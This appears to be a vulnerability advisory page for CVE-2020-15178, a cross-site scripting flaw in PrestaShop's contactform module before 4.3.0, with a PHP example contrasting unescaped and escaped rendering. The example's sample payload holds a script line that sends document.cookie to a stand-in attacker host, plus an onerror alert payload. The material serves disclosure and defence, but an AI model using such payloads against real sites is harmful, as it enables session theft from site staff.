Vulnerability Description
In the PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker can inject JavaScript through the contact form. The `message` field was not escaped before being rendered, so an attacker-supplied message may execute arbitrary JavaScript in the browser of a user who views it (cross-site scripting). Upgrading to contactform 4.3.0 or later resolves the issue.
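As an added illustration of the bug class (this is not the contactform module's own code and not the 4.3.0 patch), the PHP below renders a contact-form `message` once without escaping and once with output encoding applied before line-break conversion. The function names, the HTML wrapper and the sample payload are assumptions constructed for this example.

```php
<?php
// Added example, not code from PrestaShop/contactform.
// Shows the CVE-2020-15178 bug class: a user-controlled `message` field
// rendered into HTML unescaped, beside a hardened rendering.
declare(strict_types=1);

// Vulnerable: the raw message is concatenated into HTML. Any <script> tag
// or event handler in the message runs in the browser of whoever views it
// (for a contact form, typically the shop's back-office staff).
function renderMessageUnsafe(string $message): string
{
    return '<div class="customer-message">' . nl2br($message) . '</div>';
}

// Hardened: escape for the HTML-body context first, then convert newlines.
// Order matters: escaping after nl2br() would also neutralise the <br />
// tags nl2br() inserted, so escape first and add trusted markup second.
function renderMessageSafe(string $message): string
{
    $escaped = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="customer-message">' . nl2br($escaped) . '</div>';
}

// Crude check for a unit test: does anything other than our own wrapper and
// nl2br() output survive as live markup or attribute-breaking quotes?
// This is a test helper, not a runtime filter; output encoding is the fix.
function containsLiveMarkup(string $html): bool
{
    $body = preg_replace('#^<div class="customer-message">|</div>$#', '', $html);
    $body = str_replace('<br />', '', $body);
    return $body !== strip_tags($body)
        || strpos($body, '"') !== false
        || strpos($body, "'") !== false;
}

// Constructed sample submission, not a real captured message.
$payload = "Hello,\n"
    . "<script>document.location='https://attacker.example/?c='+document.cookie</script>\n"
    . "<img src=x onerror=alert(1)>";

echo "Unsafe render:\n" . renderMessageUnsafe($payload) . "\n\n";
echo "Safe render:\n" . renderMessageSafe($payload) . "\n\n";

if (!containsLiveMarkup(renderMessageUnsafe($payload))) {
    throw new RuntimeException('expected the unsafe render to carry live markup');
}
if (containsLiveMarkup(renderMessageSafe($payload))) {
    throw new RuntimeException('escaping failed: live markup survived');
}
echo "Escaped render contains no live markup.\n";
```

Run it with `php example.php`. The same rule applies in Smarty templates, which PrestaShop modules use for their views: a value placed into an HTML template must pass through the `escape` modifier (for example `{$message|escape:'html':'UTF-8'}`) unless it was escaped server-side already. When reviewing a fix like 4.3.0, check every place the stored message is displayed (notification e-mails, back-office message lists, front-office confirmation pages), not only the first one found.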
CVSS Score
8.0 (HIGH)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Prestashop | Contactform | < 4.3.0 |
Related Weaknesses (CWE)
- CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
References
- https://github.com/PrestaShop/contactform/commit/ecd9f5d14920ec00885766a7cb41bcc (Patch, Third Party Advisory)
- https://github.com/PrestaShop/contactform/security/advisories/GHSA-95hx-62rh-gg9 (Third Party Advisory)
- https://packagist.org/packages/prestashop/contactform (Vendor Advisory)
FAQ
What is CVE-2020-15178?
CVE-2020-15178 is a cross-site scripting vulnerability with a CVSS score of 8.0 (HIGH). In the PrestaShop contactform module (prestashop/contactform) before version 4.3.0, an attacker can inject JavaScript through the contact form. The `message` field was not escaped before being rendered, so an attacker-supplied message may execute arbitrary JavaScript in the browser of a user who views it.
How severe is CVE-2020-15178?
CVE-2020-15178 has been rated HIGH with a CVSS base score of 8.0/10. See the CVSS Score section above; the vector and per-metric breakdown are given in the linked GitHub advisory.
Is there a patch for CVE-2020-15178?
Yes. The issue is fixed in prestashop/contactform 4.3.0; the patch commit and the GitHub advisory are listed in the references section above. Affected product: Prestashop Contactform before 4.3.0.